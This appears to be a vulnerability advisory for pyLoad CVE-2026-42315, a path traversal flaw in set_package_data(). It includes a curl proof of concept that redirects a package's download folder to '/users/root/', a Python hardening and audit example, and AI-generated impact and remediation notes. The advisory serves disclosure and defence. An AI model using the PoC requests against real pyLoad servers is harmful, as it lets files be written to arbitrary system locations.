pyLoad CVE-2026-42315
Severity: HIGH (CVSS vector, NVD)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
Blast Radius
Ecosystem impact: 1 PyPI package depends on pyload-ng (1 direct, 0 indirect). Ecosystem-wide dependent count for version 0.5.0b3.dev100.
Description (NVD)
Summary
No sanitization of the package folder name allows files to be written anywhere outside the intended download directory.
Affected Component
src/pyload/core/api/__init__.py, function set_package_data()
Details
When a folder name is passed to the set_package_data() API call inside the data object under the key "_folder", it is not sanitized at all, so a user with Perms.MODIFY can set an arbitrary directory, including an absolute path, as the download location for a package.
PoC
- Create a package and note the package ID in the response (e.g. 5):
curl -X 'POST' \
  'http://localhost:8000/api/add_package' \
  -H 'accept: application/json' \
  -H 'X-API-Key: <valid api key>' \
  -H 'Content-Type: application/json' \
  -d '{
  "name": "set_package_data_exploit_poc",
  "links": [
    "http://example.com/file.txt"
  ],
  "dest": 1
}'
- Call set_package_data for this package ID with an arbitrary directory:
curl -X 'POST' \
  'http://localhost:8000/api/set_package_data' \
  -H 'accept: */*' \
  -H 'X-API-Key: <valid api key>' \
  -H 'Content-Type: application/json' \
  -d '{
  "package_id": 5,
  "data": {
    "_folder": "/users/root/"
  }
}'
- The new download folder is set without any checks:
curl -X 'GET' \
  'http://localhost:8000/api/get_queue' \
  -H 'accept: application/json' \
  -H 'X-API-Key: <valid api key>'
Response:
[
  {
    "pid": 5,
    "name": "set_package_data_exploit_poc",
    "folder": "/users/root/",
    "site": "",
    "password": "",
    "dest": 1,
    "order": 1,
    "linksdone": 0,
    "sizedone": 0,
    "sizetotal": 0,
    "linkstotal": 1,
    "links": null,
    "fids": null
  }
]
Impact
Allows absolute path traversal: downloaded files are written into an arbitrary directory, limited only by where the pyLoad process has write access.
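The fix the advisory implies is to validate the "_folder" value before it is stored. The following is an added example written for this page, not pyLoad's own code: a check that confines a package folder to the download root, a wrapper that applies it to a set_package_data() data object, and an audit that scans a get_queue response (the one from the PoC above, extended with one benign package as constructed sample input) for packages that already point outside the root. The function names and the download root /var/lib/pyload/downloads are assumptions. Paths are handled as POSIX paths so the behaviour is the same wherever the script runs; a real implementation on a Windows host should use os.path for that platform and additionally reject drive letters and UNC prefixes.

```python
import json
import posixpath

# Added example for this advisory: a hardening check for the "_folder" value that
# set_package_data() accepts, plus an audit of a get_queue response. This is
# illustrative code, not pyLoad's own implementation; the function names and
# the download root below are assumptions.

DOWNLOAD_DIR = "/var/lib/pyload/downloads"  # assumed download root


def safe_package_folder(download_dir, folder):
    """Return the resolved package folder if it stays inside download_dir.

    Raises ValueError for anything that could escape: non-string values,
    NUL bytes, backslashes (a separator on Windows hosts), absolute paths
    and '..' components. An empty folder means "download root" and is allowed.
    """
    if not isinstance(folder, str):
        raise ValueError("folder must be a string")
    if "\x00" in folder or "\\" in folder:
        raise ValueError("forbidden characters in folder name")
    if posixpath.isabs(folder):
        raise ValueError("absolute folder not allowed")
    # Reject parent references outright rather than relying on normalization.
    if any(part == ".." for part in folder.split("/")):
        raise ValueError("parent directory reference not allowed")
    root = posixpath.normpath(download_dir)
    candidate = posixpath.normpath(posixpath.join(root, folder))
    # Defense in depth: the resolved path must still sit under the root.
    if posixpath.commonpath([root, candidate]) != root:
        raise ValueError("folder escapes download directory")
    return candidate


def sanitize_package_data(data, download_dir=DOWNLOAD_DIR):
    """Validate a set_package_data() data object before it is applied.

    Returns a copy in which "_folder" is replaced by the checked path;
    any other keys are passed through untouched.
    """
    cleaned = dict(data)
    if "_folder" in cleaned:
        cleaned["_folder"] = safe_package_folder(download_dir, cleaned["_folder"])
    return cleaned


# Constructed sample: the get_queue response from the PoC plus one benign
# package (pid 6), used to show how an existing instance can be audited.
SAMPLE_QUEUE = json.dumps([
    {"pid": 5, "name": "set_package_data_exploit_poc", "folder": "/users/root/",
     "dest": 1, "order": 1, "linkstotal": 1},
    {"pid": 6, "name": "benign", "folder": "movies/2024",
     "dest": 1, "order": 2, "linkstotal": 3},
])


def escaping_packages(queue_json, download_dir=DOWNLOAD_DIR):
    """Return the pids from a get_queue response whose folder escapes the root."""
    flagged = []
    for pkg in json.loads(queue_json):
        try:
            safe_package_folder(download_dir, pkg.get("folder", ""))
        except ValueError:
            flagged.append(pkg["pid"])
    return flagged


if __name__ == "__main__":
    print(sanitize_package_data({"_folder": "movies/2024"}))
    print("packages escaping the download root:", escaping_packages(SAMPLE_QUEUE))
    try:
        sanitize_package_data({"_folder": "/users/root/"})
    except ValueError as exc:
        print("rejected:", exc)
```

Rejecting ".." components before normalizing is deliberate: normalization alone would accept inputs such as "../downloads/x" that happen to resolve back under the root, and a reviewer can verify a plain component check more easily than a path-resolution argument. The commonpath comparison remains as a second line of defence in case the first check is ever loosened.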
Analysis (AI-generated)
Absolute path traversal in the pyLoad download manager allows authenticated users to write files to arbitrary filesystem locations via unsanitized package folder names passed to the set_package_data() API function. Users with Perms.MODIFY can redirect downloads to sensitive directories (e.g., /etc, /root, other system directories), bypassing the intended download directory restriction and enabling configuration overwrite or denial of service through disk exhaustion. …
Remediation (AI-generated)
Within 24 hours: inventory all systems running pyLoad and document their versions; restrict modification permissions (Perms.MODIFY) to trusted administrators only and audit current permission assignments. Within 7 days: segment the network around pyLoad hosts and limit the privileges of the pyLoad process, monitor file write operations from pyLoad processes to sensitive directories (/etc, /root, system paths), and consider disabling pyLoad if it is not operationally critical. …
External PoC / Exploit Code
GHSA-838g-gr43-qqg9